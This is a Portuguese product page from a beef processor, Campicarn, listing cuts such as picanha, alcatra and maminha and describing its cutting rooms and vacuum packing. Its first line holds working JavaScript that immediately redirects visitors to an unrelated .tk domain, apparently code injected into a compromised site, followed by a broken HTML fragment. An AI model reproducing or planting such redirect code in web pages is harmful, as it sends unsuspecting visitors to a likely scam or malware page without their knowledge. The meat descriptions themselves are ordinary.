window.location.replace("https://asphoenono.tk/help/?15131619432237");window.location.href = "https://asphoenono.tk/help/?15131619432237";lang="pt-pt" id="arve"> Vaca – Campicarn

Peças - Vaca

Nas salas de desmancha, com capacidade para desossar e desmanchar 500 carcaças por dia, o processo é realizado de acordo com diferentes padrões de corte em função das necessidades dos clientes.

Os cortes são comercializados em fresco ou embalados em vácuo.

O embalamento a vácuo mantém a carne fresca e ainda mais tenra (conservada entre os 0ºC e os 4ºC).

Lombo

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Vazia

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Tomahawk

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Picanha

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A picanha é uma carne de 1ª categoria, conhecida pela sua maciez e sabor acentuado, devido à camada de gordura que a envolve. Ela pode ser assada no forno, mas o churrasco é o ponto forte de confeção desta peça de carne tão suculenta.

Alcatra

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Maminha

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Ganso Redondo

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Pojadouro

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Rabadilha

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